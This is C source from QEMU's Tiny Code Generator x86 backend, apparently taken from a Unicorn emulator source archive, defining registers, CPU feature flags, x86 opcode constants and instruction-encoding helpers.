TCG_REG_EBP, TCG_REG_ESI, TCG_REG_EDI, /* 64-bit registers; always define the symbols to avoid too much if-deffing. */ TCG_REG_R8, TCG_REG_R9, TCG_REG_R10, TCG_REG_R11, TCG_REG_R12, TCG_REG_R13, TCG_REG_R14, TCG_REG_R15, TCG_REG_XMM0, TCG_REG_XMM1, TCG_REG_XMM2, TCG_REG_XMM3, TCG_REG_XMM4, TCG_REG_XMM5, TCG_REG_XMM6, TCG_REG_XMM7, /* 64-bit registers; likewise always define. */ TCG_REG_XMM8, TCG_REG_XMM9, TCG_REG_XMM10, TCG_REG_XMM11, TCG_REG_XMM12, TCG_REG_XMM13, TCG_REG_XMM14, TCG_REG_XMM15, TCG_REG_RAX = TCG_REG_EAX, TCG_REG_RCX = TCG_REG_ECX, TCG_REG_RDX = TCG_REG_EDX, TCG_REG_RBX = TCG_REG_EBX, TCG_REG_RSP = TCG_REG_ESP, TCG_REG_RBP = TCG_REG_EBP, TCG_REG_RSI = TCG_REG_ESI, TCG_REG_RDI = TCG_REG_EDI, TCG_AREG0 = TCG_REG_EBP, TCG_REG_CALL_STACK = TCG_REG_ESP } TCGReg; /* used for function call generation */ #define TCG_TARGET_STACK_ALIGN 16 #if defined(_WIN64) #define TCG_TARGET_CALL_STACK_OFFSET 32 #else #define TCG_TARGET_CALL_STACK_OFFSET 0 #endif extern bool have_bmi1; extern bool have_popcnt; extern bool have_avx1; extern bool have_avx2; /* optional instructions */ #define TCG_TARGET_HAS_div2_i32 1 #define TCG_TARGET_HAS_rot_i32 1 #define TCG_TARGET_HAS_ext8s_i32 1 #define TCG_TARGET_HAS_ext16s_i32 1 #define TCG_TARGET_HAS_ext8u_i32 1 #define TCG_TARGET_HAS_ext16u_i32 1 #define TCG_TARGET_HAS_bswap16_i32 1 #define TCG_TARGET_HAS_bswap32_i32 1 #define TCG_TARGET_HAS_neg_i32 1 #define TCG_TARGET_HAS_not_i32 1 #define TCG_TARGET_HAS_andc_i32 have_bmi1 #define TCG_TARGET_HAS_orc_i32 0 #define TCG_TARGET_HAS_eqv_i32 0 #define TCG_TARGET_HAS_nand_i32 0 #define TCG_TARGET_HAS_nor_i32 0 #define TCG_TARGET_HAS_clz_i32 1 #define TCG_TARGET_HAS_ctz_i32 1 #define TCG_TARGET_HAS_ctpop_i32 have_popcnt #define TCG_TARGET_HAS_deposit_i32 1 #define TCG_TARGET_HAS_extract_i32 1 #define TCG_TARGET_HAS_sextract_i32 1 #define TCG_TARGET_HAS_extract2_i32 1 #define TCG_TARGET_HAS_movcond_i32 1 #define TCG_TARGET_HAS_add2_i32 1 #define TCG_TARGET_HAS_sub2_i32 1 #define TCG_TARGET_HAS_mulu2_i32 1 #define TCG_TARGET_HAS_muls2_i32 1 #define TCG_TARGET_HAS_muluh_i32 0 #define TCG_TARGET_HAS_mulsh_i32 0 #define TCG_TARGET_HAS_goto_ptr 1 #define TCG_TARGET_HAS_direct_jump 1 #if TCG_TARGET_REG_BITS == 64 /* Keep target addresses zero-extended in a register. 
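   With a 32-bit guest on a 64-bit host, a zero-extended address can be used directly in 64-bit addressing modes; hence the extr{l,h}_i64_i32 ops below are only advertised when TARGET_LONG_BITS == 32.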
*/ #define TCG_TARGET_HAS_extrl_i64_i32 (TARGET_LONG_BITS == 32) #define TCG_TARGET_HAS_extrh_i64_i32 (TARGET_LONG_BITS == 32) #define TCG_TARGET_HAS_div2_i64 1 #define TCG_TARGET_HAS_rot_i64 1 #define TCG_TARGET_HAS_ext8s_i64 1 #define TCG_TARGET_HAS_ext16s_i64 1 #define TCG_TARGET_HAS_ext32s_i64 1 #define TCG_TARGET_HAS_ext8u_i64 1 #define TCG_TARGET_HAS_ext16u_i64 1 #define TCG_TARGET_HAS_ext32u_i64 1 #define TCG_TARGET_HAS_bswap16_i64 1 #define TCG_TARGET_HAS_bswap32_i64 1 #define TCG_TARGET_HAS_bswap64_i64 1 #define TCG_TARGET_HAS_neg_i64 1 #define TCG_TARGET_HAS_not_i64 1 #define TCG_TARGET_HAS_andc_i64 have_bmi1 #define TCG_TARGET_HAS_orc_i64 0 #define TCG_TARGET_HAS_eqv_i64 0 #define TCG_TARGET_HAS_nand_i64 0 #define TCG_TARGET_HAS_nor_i64 0 #define TCG_TARGET_HAS_clz_i64 1 #define TCG_TARGET_HAS_ctz_i64 1 #define TCG_TARGET_HAS_ctpop_i64 have_popcnt #define TCG_TARGET_HAS_deposit_i64 1 #define TCG_TARGET_HAS_extract_i64 1 #define TCG_TARGET_HAS_sextract_i64 0 #define TCG_TARGET_HAS_extract2_i64 1 #define TCG_TARGET_HAS_movcond_i64 1 #define TCG_TARGET_HAS_add2_i64 1 #define TCG_TARGET_HAS_sub2_i64 1 #define TCG_TARGET_HAS_mulu2_i64 1 #define TCG_TARGET_HAS_muls2_i64 1 #define TCG_TARGET_HAS_muluh_i64 0 #define TCG_TARGET_HAS_mulsh_i64 0 #endif /* We do not support older SSE systems, only beginning with AVX1. */ #define TCG_TARGET_HAS_v64 have_avx1 #define TCG_TARGET_HAS_v128 have_avx1 #define TCG_TARGET_HAS_v256 have_avx2 #define TCG_TARGET_HAS_andc_vec 1 #define TCG_TARGET_HAS_orc_vec 0 #define TCG_TARGET_HAS_not_vec 0 #define TCG_TARGET_HAS_neg_vec 0 #define TCG_TARGET_HAS_abs_vec 1 #define TCG_TARGET_HAS_shi_vec 1 #define TCG_TARGET_HAS_shs_vec 1 #define TCG_TARGET_HAS_shv_vec have_avx2 #define TCG_TARGET_HAS_cmp_vec 1 #define TCG_TARGET_HAS_mul_vec 1 #define TCG_TARGET_HAS_sat_vec 1 #define TCG_TARGET_HAS_minmax_vec 1 #define TCG_TARGET_HAS_bitsel_vec 0 #define TCG_TARGET_HAS_cmpsel_vec -1 #define TCG_TARGET_deposit_i32_valid(ofs, len) \ (((ofs) == 0 && (len) == 8) || ((ofs) == 8 && (len) == 8) || \ ((ofs) == 0 && (len) == 16)) #define TCG_TARGET_deposit_i64_valid TCG_TARGET_deposit_i32_valid /* Check for the possibility of high-byte extraction and, for 64-bit, zero-extending 32-bit right-shift. */ #define TCG_TARGET_extract_i32_valid(ofs, len) ((ofs) == 8 && (len) == 8) #define TCG_TARGET_extract_i64_valid(ofs, len) \ (((ofs) == 8 && (len) == 8) || ((ofs) + (len)) == 32) static inline void flush_icache_range(uintptr_t start, uintptr_t stop) { } static inline void tb_target_set_jmp_target(uintptr_t tc_ptr, uintptr_t jmp_addr, uintptr_t addr) { /* patch the branch destination */ *(int32_t *)jmp_addr = addr - (jmp_addr + 4); /* no need to flush icache explicitly */ } /* This defines the natural memory order supported by this * architecture before guarantees made by various barrier * instructions. * * The x86 has a pretty strong memory ordering which only really * allows for some stores to be re-ordered after loads. 
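   Hence TCG_TARGET_DEFAULT_MO below: every ordering in TCG_MO_ALL except store-followed-by-load is already guaranteed by the hardware, so only that pair ever needs a real fence.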
*/ #include "tcg/tcg-mo.h" #define TCG_TARGET_DEFAULT_MO (TCG_MO_ALL & ~TCG_MO_ST_LD) #define TCG_TARGET_HAS_MEMORY_BSWAP 1 #define TCG_TARGET_NEED_LDST_LABELS #define TCG_TARGET_NEED_POOL_LABELS #endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/i386/tcg-target.inc.c��������������������������������������������������������0000664�0000000�0000000�00000371367�14675241067�0020417�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Tiny Code Generator for QEMU * * Copyright (c) 2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include "../tcg-pool.inc.c" #ifdef _MSC_VER #include <intrin.h> #endif #ifdef CONFIG_DEBUG_TCG static const char * const tcg_target_reg_names[TCG_TARGET_NB_REGS] = { #if TCG_TARGET_REG_BITS == 64 "%rax", "%rcx", "%rdx", "%rbx", "%rsp", "%rbp", "%rsi", "%rdi", #else "%eax", "%ecx", "%edx", "%ebx", "%esp", "%ebp", "%esi", "%edi", #endif "%r8", "%r9", "%r10", "%r11", "%r12", "%r13", "%r14", "%r15", "%xmm0", "%xmm1", "%xmm2", "%xmm3", "%xmm4", "%xmm5", "%xmm6", "%xmm7", #if TCG_TARGET_REG_BITS == 64 "%xmm8", "%xmm9", "%xmm10", "%xmm11", "%xmm12", "%xmm13", "%xmm14", "%xmm15", #endif }; #endif static const int tcg_target_reg_alloc_order[] = { #if TCG_TARGET_REG_BITS == 64 TCG_REG_RBP, TCG_REG_RBX, TCG_REG_R12, TCG_REG_R13, TCG_REG_R14, TCG_REG_R15, TCG_REG_R10, TCG_REG_R11, TCG_REG_R9, TCG_REG_R8, TCG_REG_RCX, TCG_REG_RDX, TCG_REG_RSI, TCG_REG_RDI, TCG_REG_RAX, #else TCG_REG_EBX, TCG_REG_ESI, TCG_REG_EDI, TCG_REG_EBP, TCG_REG_ECX, TCG_REG_EDX, TCG_REG_EAX, #endif TCG_REG_XMM0, TCG_REG_XMM1, TCG_REG_XMM2, TCG_REG_XMM3, TCG_REG_XMM4, TCG_REG_XMM5, #ifndef _WIN64 /* The Win64 ABI has xmm6-xmm15 as caller-saves, and we do not save any of them. Therefore only allow xmm0-xmm5 to be allocated. 
*/ TCG_REG_XMM6, TCG_REG_XMM7, #if TCG_TARGET_REG_BITS == 64 TCG_REG_XMM8, TCG_REG_XMM9, TCG_REG_XMM10, TCG_REG_XMM11, TCG_REG_XMM12, TCG_REG_XMM13, TCG_REG_XMM14, TCG_REG_XMM15, #endif #endif }; static const int tcg_target_call_iarg_regs[] = { #if TCG_TARGET_REG_BITS == 64 #if defined(_WIN64) TCG_REG_RCX, TCG_REG_RDX, #else TCG_REG_RDI, TCG_REG_RSI, TCG_REG_RDX, TCG_REG_RCX, #endif TCG_REG_R8, TCG_REG_R9, #else /* 32 bit mode uses stack based calling convention (GCC default). */ #ifdef _MSC_VER 0, // MSVC needs dummy value to avoid empty array #endif #endif }; static const int tcg_target_call_oarg_regs[] = { TCG_REG_EAX, #if TCG_TARGET_REG_BITS == 32 TCG_REG_EDX #endif }; /* Constants we accept. */ #define TCG_CT_CONST_S32 0x100 #define TCG_CT_CONST_U32 0x200 #define TCG_CT_CONST_I32 0x400 #define TCG_CT_CONST_WSZ 0x800 /* Registers used with L constraint, which are the first argument registers on x86_64, and two random call clobbered registers on i386. */ #if TCG_TARGET_REG_BITS == 64 # define TCG_REG_L0 tcg_target_call_iarg_regs[0] # define TCG_REG_L1 tcg_target_call_iarg_regs[1] #else # define TCG_REG_L0 TCG_REG_EAX # define TCG_REG_L1 TCG_REG_EDX #endif /* The host compiler should supply <cpuid.h> to enable runtime features detection, as we're not going to go so far as our own inline assembly. If not available, default values will be assumed. */ #if defined(CONFIG_CPUID_H) #include "qemu/cpuid.h" #endif /* For 64-bit, we always know that CMOV is available. */ #if TCG_TARGET_REG_BITS == 64 # define have_cmov 1 #elif defined(CONFIG_CPUID_H) static bool have_cmov; #else # define have_cmov 0 #endif /* We need these symbols in tcg-target.h, and we can't properly conditionalize it there. Therefore we always define the variable. */ bool have_bmi1; bool have_popcnt; bool have_avx1; bool have_avx2; #ifdef CONFIG_CPUID_H static bool have_movbe; static bool have_bmi2; static bool have_lzcnt; #else # define have_movbe 0 # define have_bmi2 0 # define have_lzcnt 0 #endif static bool patch_reloc(tcg_insn_unit *code_ptr, int type, intptr_t value, intptr_t addend) { value += addend; switch(type) { case R_386_PC32: value -= (uintptr_t)code_ptr; if (value != (int32_t)value) { return false; } /* FALLTHRU */ case R_386_32: tcg_patch32(code_ptr, value); break; case R_386_PC8: value -= (uintptr_t)code_ptr; if (value != (int8_t)value) { return false; } tcg_patch8(code_ptr, value); break; default: tcg_abort(); } return true; } #if TCG_TARGET_REG_BITS == 64 #define ALL_GENERAL_REGS 0x0000ffffu #define ALL_VECTOR_REGS 0xffff0000u #else #define ALL_GENERAL_REGS 0x000000ffu #define ALL_VECTOR_REGS 0x00ff0000u #endif /* parse target specific constraints */ static const char *target_parse_constraint(TCGArgConstraint *ct, const char *ct_str, TCGType type) { switch(*ct_str++) { case 'a': ct->ct |= TCG_CT_REG; tcg_regset_set_reg(ct->u.regs, TCG_REG_EAX); break; case 'b': ct->ct |= TCG_CT_REG; tcg_regset_set_reg(ct->u.regs, TCG_REG_EBX); break; case 'c': ct->ct |= TCG_CT_REG; tcg_regset_set_reg(ct->u.regs, TCG_REG_ECX); break; case 'd': ct->ct |= TCG_CT_REG; tcg_regset_set_reg(ct->u.regs, TCG_REG_EDX); break; case 'S': ct->ct |= TCG_CT_REG; tcg_regset_set_reg(ct->u.regs, TCG_REG_ESI); break; case 'D': ct->ct |= TCG_CT_REG; tcg_regset_set_reg(ct->u.regs, TCG_REG_EDI); break; case 'q': /* A register that can be used as a byte operand. */ ct->ct |= TCG_CT_REG; ct->u.regs = TCG_TARGET_REG_BITS == 64 ? 0xffff : 0xf; break; case 'Q': /* A register with an addressable second byte (e.g. %ah). 
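   Only %eax, %ecx, %edx and %ebx have such a high-byte alias, hence the 0xf mask below.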
*/ ct->ct |= TCG_CT_REG; ct->u.regs = 0xf; break; case 'r': /* A general register. */ ct->ct |= TCG_CT_REG; ct->u.regs |= ALL_GENERAL_REGS; break; case 'W': /* With TZCNT/LZCNT, we can have operand-size as an input. */ ct->ct |= TCG_CT_CONST_WSZ; break; case 'x': /* A vector register. */ ct->ct |= TCG_CT_REG; ct->u.regs |= ALL_VECTOR_REGS; break; /* qemu_ld/st address constraint */ case 'L': ct->ct |= TCG_CT_REG; ct->u.regs = TCG_TARGET_REG_BITS == 64 ? 0xffff : 0xff; tcg_regset_reset_reg(ct->u.regs, TCG_REG_L0); tcg_regset_reset_reg(ct->u.regs, TCG_REG_L1); break; case 'e': ct->ct |= (type == TCG_TYPE_I32 ? TCG_CT_CONST : TCG_CT_CONST_S32); break; case 'Z': ct->ct |= (type == TCG_TYPE_I32 ? TCG_CT_CONST : TCG_CT_CONST_U32); break; case 'I': ct->ct |= (type == TCG_TYPE_I32 ? TCG_CT_CONST : TCG_CT_CONST_I32); break; default: return NULL; } return ct_str; } /* test if a constant matches the constraint */ static inline int tcg_target_const_match(tcg_target_long val, TCGType type, const TCGArgConstraint *arg_ct) { int ct = arg_ct->ct; if (ct & TCG_CT_CONST) { return 1; } if ((ct & TCG_CT_CONST_S32) && val == (int32_t)val) { return 1; } if ((ct & TCG_CT_CONST_U32) && val == (uint32_t)val) { return 1; } if ((ct & TCG_CT_CONST_I32) && ~val == (int32_t)~val) { return 1; } if ((ct & TCG_CT_CONST_WSZ) && val == (type == TCG_TYPE_I32 ? 32 : 64)) { return 1; } return 0; } # define LOWREGMASK(x) ((x) & 7) #define P_EXT 0x100 /* 0x0f opcode prefix */ #define P_EXT38 0x200 /* 0x0f 0x38 opcode prefix */ #define P_DATA16 0x400 /* 0x66 opcode prefix */ #if TCG_TARGET_REG_BITS == 64 # define P_REXW 0x1000 /* Set REX.W = 1 */ # define P_REXB_R 0x2000 /* REG field as byte register */ # define P_REXB_RM 0x4000 /* R/M field as byte register */ # define P_GS 0x8000 /* gs segment override */ #else # define P_REXW 0 # define P_REXB_R 0 # define P_REXB_RM 0 # define P_GS 0 #endif #define P_EXT3A 0x10000 /* 0x0f 0x3a opcode prefix */ #define P_SIMDF3 0x20000 /* 0xf3 opcode prefix */ #define P_SIMDF2 0x40000 /* 0xf2 opcode prefix */ #define P_VEXL 0x80000 /* Set VEX.L = 1 */ #define OPC_ARITH_EvIz (0x81) #define OPC_ARITH_EvIb (0x83) #define OPC_ARITH_GvEv (0x03) /* ... plus (ARITH_FOO << 3) */ #define OPC_ANDN (0xf2 | P_EXT38) #define OPC_ADD_GvEv (OPC_ARITH_GvEv | (ARITH_ADD << 3)) #define OPC_AND_GvEv (OPC_ARITH_GvEv | (ARITH_AND << 3)) #define OPC_BLENDPS (0x0c | P_EXT3A | P_DATA16) #define OPC_BSF (0xbc | P_EXT) #define OPC_BSR (0xbd | P_EXT) #define OPC_BSWAP (0xc8 | P_EXT) #define OPC_CALL_Jz (0xe8) #define OPC_CMOVCC (0x40 | P_EXT) /* ... plus condition code */ #define OPC_CMP_GvEv (OPC_ARITH_GvEv | (ARITH_CMP << 3)) #define OPC_DEC_r32 (0x48) #define OPC_IMUL_GvEv (0xaf | P_EXT) #define OPC_IMUL_GvEvIb (0x6b) #define OPC_IMUL_GvEvIz (0x69) #define OPC_INC_r32 (0x40) #define OPC_JCC_long (0x80 | P_EXT) /* ... plus condition code */ #define OPC_JCC_short (0x70) /* ... 
plus condition code */ #define OPC_JMP_long (0xe9) #define OPC_JMP_short (0xeb) #define OPC_LEA (0x8d) #define OPC_LZCNT (0xbd | P_EXT | P_SIMDF3) #define OPC_MOVB_EvGv (0x88) /* stores, more or less */ #define OPC_MOVL_EvGv (0x89) /* stores, more or less */ #define OPC_MOVL_GvEv (0x8b) /* loads, more or less */ #define OPC_MOVB_EvIz (0xc6) #define OPC_MOVL_EvIz (0xc7) #define OPC_MOVL_Iv (0xb8) #define OPC_MOVBE_GyMy (0xf0 | P_EXT38) #define OPC_MOVBE_MyGy (0xf1 | P_EXT38) #define OPC_MOVD_VyEy (0x6e | P_EXT | P_DATA16) #define OPC_MOVD_EyVy (0x7e | P_EXT | P_DATA16) #define OPC_MOVDDUP (0x12 | P_EXT | P_SIMDF2) #define OPC_MOVDQA_VxWx (0x6f | P_EXT | P_DATA16) #define OPC_MOVDQA_WxVx (0x7f | P_EXT | P_DATA16) #define OPC_MOVDQU_VxWx (0x6f | P_EXT | P_SIMDF3) #define OPC_MOVDQU_WxVx (0x7f | P_EXT | P_SIMDF3) #define OPC_MOVQ_VqWq (0x7e | P_EXT | P_SIMDF3) #define OPC_MOVQ_WqVq (0xd6 | P_EXT | P_DATA16) #define OPC_MOVSBL (0xbe | P_EXT) #define OPC_MOVSWL (0xbf | P_EXT) #define OPC_MOVSLQ (0x63 | P_REXW) #define OPC_MOVZBL (0xb6 | P_EXT) #define OPC_MOVZWL (0xb7 | P_EXT) #define OPC_PABSB (0x1c | P_EXT38 | P_DATA16) #define OPC_PABSW (0x1d | P_EXT38 | P_DATA16) #define OPC_PABSD (0x1e | P_EXT38 | P_DATA16) #define OPC_PACKSSDW (0x6b | P_EXT | P_DATA16) #define OPC_PACKSSWB (0x63 | P_EXT | P_DATA16) #define OPC_PACKUSDW (0x2b | P_EXT38 | P_DATA16) #define OPC_PACKUSWB (0x67 | P_EXT | P_DATA16) #define OPC_PADDB (0xfc | P_EXT | P_DATA16) #define OPC_PADDW (0xfd | P_EXT | P_DATA16) #define OPC_PADDD (0xfe | P_EXT | P_DATA16) #define OPC_PADDQ (0xd4 | P_EXT | P_DATA16) #define OPC_PADDSB (0xec | P_EXT | P_DATA16) #define OPC_PADDSW (0xed | P_EXT | P_DATA16) #define OPC_PADDUB (0xdc | P_EXT | P_DATA16) #define OPC_PADDUW (0xdd | P_EXT | P_DATA16) #define OPC_PAND (0xdb | P_EXT | P_DATA16) #define OPC_PANDN (0xdf | P_EXT | P_DATA16) #define OPC_PBLENDW (0x0e | P_EXT3A | P_DATA16) #define OPC_PCMPEQB (0x74 | P_EXT | P_DATA16) #define OPC_PCMPEQW (0x75 | P_EXT | P_DATA16) #define OPC_PCMPEQD (0x76 | P_EXT | P_DATA16) #define OPC_PCMPEQQ (0x29 | P_EXT38 | P_DATA16) #define OPC_PCMPGTB (0x64 | P_EXT | P_DATA16) #define OPC_PCMPGTW (0x65 | P_EXT | P_DATA16) #define OPC_PCMPGTD (0x66 | P_EXT | P_DATA16) #define OPC_PCMPGTQ (0x37 | P_EXT38 | P_DATA16) #define OPC_PMAXSB (0x3c | P_EXT38 | P_DATA16) #define OPC_PMAXSW (0xee | P_EXT | P_DATA16) #define OPC_PMAXSD (0x3d | P_EXT38 | P_DATA16) #define OPC_PMAXUB (0xde | P_EXT | P_DATA16) #define OPC_PMAXUW (0x3e | P_EXT38 | P_DATA16) #define OPC_PMAXUD (0x3f | P_EXT38 | P_DATA16) #define OPC_PMINSB (0x38 | P_EXT38 | P_DATA16) #define OPC_PMINSW (0xea | P_EXT | P_DATA16) #define OPC_PMINSD (0x39 | P_EXT38 | P_DATA16) #define OPC_PMINUB (0xda | P_EXT | P_DATA16) #define OPC_PMINUW (0x3a | P_EXT38 | P_DATA16) #define OPC_PMINUD (0x3b | P_EXT38 | P_DATA16) #define OPC_PMOVSXBW (0x20 | P_EXT38 | P_DATA16) #define OPC_PMOVSXWD (0x23 | P_EXT38 | P_DATA16) #define OPC_PMOVSXDQ (0x25 | P_EXT38 | P_DATA16) #define OPC_PMOVZXBW (0x30 | P_EXT38 | P_DATA16) #define OPC_PMOVZXWD (0x33 | P_EXT38 | P_DATA16) #define OPC_PMOVZXDQ (0x35 | P_EXT38 | P_DATA16) #define OPC_PMULLW (0xd5 | P_EXT | P_DATA16) #define OPC_PMULLD (0x40 | P_EXT38 | P_DATA16) #define OPC_POR (0xeb | P_EXT | P_DATA16) #define OPC_PSHUFB (0x00 | P_EXT38 | P_DATA16) #define OPC_PSHUFD (0x70 | P_EXT | P_DATA16) #define OPC_PSHUFLW (0x70 | P_EXT | P_SIMDF2) #define OPC_PSHUFHW (0x70 | P_EXT | P_SIMDF3) #define OPC_PSHIFTW_Ib (0x71 | P_EXT | P_DATA16) /* /2 /6 /4 */ #define OPC_PSHIFTD_Ib (0x72 | P_EXT | 
P_DATA16) /* /2 /6 /4 */ #define OPC_PSHIFTQ_Ib (0x73 | P_EXT | P_DATA16) /* /2 /6 /4 */ #define OPC_PSLLW (0xf1 | P_EXT | P_DATA16) #define OPC_PSLLD (0xf2 | P_EXT | P_DATA16) #define OPC_PSLLQ (0xf3 | P_EXT | P_DATA16) #define OPC_PSRAW (0xe1 | P_EXT | P_DATA16) #define OPC_PSRAD (0xe2 | P_EXT | P_DATA16) #define OPC_PSRLW (0xd1 | P_EXT | P_DATA16) #define OPC_PSRLD (0xd2 | P_EXT | P_DATA16) #define OPC_PSRLQ (0xd3 | P_EXT | P_DATA16) #define OPC_PSUBB (0xf8 | P_EXT | P_DATA16) #define OPC_PSUBW (0xf9 | P_EXT | P_DATA16) #define OPC_PSUBD (0xfa | P_EXT | P_DATA16) #define OPC_PSUBQ (0xfb | P_EXT | P_DATA16) #define OPC_PSUBSB (0xe8 | P_EXT | P_DATA16) #define OPC_PSUBSW (0xe9 | P_EXT | P_DATA16) #define OPC_PSUBUB (0xd8 | P_EXT | P_DATA16) #define OPC_PSUBUW (0xd9 | P_EXT | P_DATA16) #define OPC_PUNPCKLBW (0x60 | P_EXT | P_DATA16) #define OPC_PUNPCKLWD (0x61 | P_EXT | P_DATA16) #define OPC_PUNPCKLDQ (0x62 | P_EXT | P_DATA16) #define OPC_PUNPCKLQDQ (0x6c | P_EXT | P_DATA16) #define OPC_PUNPCKHBW (0x68 | P_EXT | P_DATA16) #define OPC_PUNPCKHWD (0x69 | P_EXT | P_DATA16) #define OPC_PUNPCKHDQ (0x6a | P_EXT | P_DATA16) #define OPC_PUNPCKHQDQ (0x6d | P_EXT | P_DATA16) #define OPC_PXOR (0xef | P_EXT | P_DATA16) #define OPC_POP_r32 (0x58) #define OPC_POPCNT (0xb8 | P_EXT | P_SIMDF3) #define OPC_PUSH_r32 (0x50) #define OPC_PUSH_Iv (0x68) #define OPC_PUSH_Ib (0x6a) #define OPC_RET (0xc3) #define OPC_SETCC (0x90 | P_EXT | P_REXB_RM) /* ... plus cc */ #define OPC_SHIFT_1 (0xd1) #define OPC_SHIFT_Ib (0xc1) #define OPC_SHIFT_cl (0xd3) #define OPC_SARX (0xf7 | P_EXT38 | P_SIMDF3) #define OPC_SHUFPS (0xc6 | P_EXT) #define OPC_SHLX (0xf7 | P_EXT38 | P_DATA16) #define OPC_SHRX (0xf7 | P_EXT38 | P_SIMDF2) #define OPC_SHRD_Ib (0xac | P_EXT) #define OPC_TESTL (0x85) #define OPC_TZCNT (0xbc | P_EXT | P_SIMDF3) #define OPC_UD2 (0x0b | P_EXT) #define OPC_VPBLENDD (0x02 | P_EXT3A | P_DATA16) #define OPC_VPBLENDVB (0x4c | P_EXT3A | P_DATA16) #define OPC_VPINSRB (0x20 | P_EXT3A | P_DATA16) #define OPC_VPINSRW (0xc4 | P_EXT | P_DATA16) #define OPC_VBROADCASTSS (0x18 | P_EXT38 | P_DATA16) #define OPC_VBROADCASTSD (0x19 | P_EXT38 | P_DATA16) #define OPC_VPBROADCASTB (0x78 | P_EXT38 | P_DATA16) #define OPC_VPBROADCASTW (0x79 | P_EXT38 | P_DATA16) #define OPC_VPBROADCASTD (0x58 | P_EXT38 | P_DATA16) #define OPC_VPBROADCASTQ (0x59 | P_EXT38 | P_DATA16) #define OPC_VPERMQ (0x00 | P_EXT3A | P_DATA16 | P_REXW) #define OPC_VPERM2I128 (0x46 | P_EXT3A | P_DATA16 | P_VEXL) #define OPC_VPSLLVD (0x47 | P_EXT38 | P_DATA16) #define OPC_VPSLLVQ (0x47 | P_EXT38 | P_DATA16 | P_REXW) #define OPC_VPSRAVD (0x46 | P_EXT38 | P_DATA16) #define OPC_VPSRLVD (0x45 | P_EXT38 | P_DATA16) #define OPC_VPSRLVQ (0x45 | P_EXT38 | P_DATA16 | P_REXW) #define OPC_VZEROUPPER (0x77 | P_EXT) #define OPC_XCHG_ax_r32 (0x90) #define OPC_GRP3_Ev (0xf7) #define OPC_GRP5 (0xff) #define OPC_GRP14 (0x73 | P_EXT | P_DATA16) /* Group 1 opcode extensions for 0x80-0x83. These are also used as modifiers for OPC_ARITH. */ #define ARITH_ADD 0 #define ARITH_OR 1 #define ARITH_ADC 2 #define ARITH_SBB 3 #define ARITH_AND 4 #define ARITH_SUB 5 #define ARITH_XOR 6 #define ARITH_CMP 7 /* Group 2 opcode extensions for 0xc0, 0xc1, 0xd0-0xd3. */ #define SHIFT_ROL 0 #define SHIFT_ROR 1 #define SHIFT_SHL 4 #define SHIFT_SHR 5 #define SHIFT_SAR 7 /* Group 3 opcode extensions for 0xf6, 0xf7. To be used with OPC_GRP3. */ #define EXT3_NOT 2 #define EXT3_NEG 3 #define EXT3_MUL 4 #define EXT3_IMUL 5 #define EXT3_DIV 6 #define EXT3_IDIV 7 /* Group 5 opcode extensions for 0xff. 
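   Each value is placed in the ModRM reg field, i.e. it is the
   "/digit" of the opcode tables.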
To be used with OPC_GRP5. */ #define EXT5_INC_Ev 0 #define EXT5_DEC_Ev 1 #define EXT5_CALLN_Ev 2 #define EXT5_JMPN_Ev 4 /* Condition codes to be added to OPC_JCC_{long,short}. */ #define JCC_JMP (-1) #define JCC_JO 0x0 #define JCC_JNO 0x1 #define JCC_JB 0x2 #define JCC_JAE 0x3 #define JCC_JE 0x4 #define JCC_JNE 0x5 #define JCC_JBE 0x6 #define JCC_JA 0x7 #define JCC_JS 0x8 #define JCC_JNS 0x9 #define JCC_JP 0xa #define JCC_JNP 0xb #define JCC_JL 0xc #define JCC_JGE 0xd #define JCC_JLE 0xe #define JCC_JG 0xf static const uint8_t tcg_cond_to_jcc[] = { [TCG_COND_EQ] = JCC_JE, [TCG_COND_NE] = JCC_JNE, [TCG_COND_LT] = JCC_JL, [TCG_COND_GE] = JCC_JGE, [TCG_COND_LE] = JCC_JLE, [TCG_COND_GT] = JCC_JG, [TCG_COND_LTU] = JCC_JB, [TCG_COND_GEU] = JCC_JAE, [TCG_COND_LEU] = JCC_JBE, [TCG_COND_GTU] = JCC_JA, }; #if TCG_TARGET_REG_BITS == 64 static void tcg_out_opc(TCGContext *s, int opc, int r, int rm, int x) { int rex; if (opc & P_GS) { tcg_out8(s, 0x65); } if (opc & P_DATA16) { /* We should never be asking for both 16 and 64-bit operation. */ tcg_debug_assert((opc & P_REXW) == 0); tcg_out8(s, 0x66); } if (opc & P_SIMDF3) { tcg_out8(s, 0xf3); } else if (opc & P_SIMDF2) { tcg_out8(s, 0xf2); } rex = 0; rex |= (opc & P_REXW) ? 0x8 : 0x0; /* REX.W */ rex |= (r & 8) >> 1; /* REX.R */ rex |= (x & 8) >> 2; /* REX.X */ rex |= (rm & 8) >> 3; /* REX.B */ /* P_REXB_{R,RM} indicates that the given register is the low byte. For %[abcd]l we need no REX prefix, but for %{si,di,bp,sp}l we do, as otherwise the encoding indicates %[abcd]h. Note that the values that are ORed in merely indicate that the REX byte must be present; those bits get discarded in output. */ rex |= opc & (r >= 4 ? P_REXB_R : 0); rex |= opc & (rm >= 4 ? P_REXB_RM : 0); if (rex) { tcg_out8(s, (uint8_t)(rex | 0x40)); } if (opc & (P_EXT | P_EXT38 | P_EXT3A)) { tcg_out8(s, 0x0f); if (opc & P_EXT38) { tcg_out8(s, 0x38); } else if (opc & P_EXT3A) { tcg_out8(s, 0x3a); } } tcg_out8(s, opc); 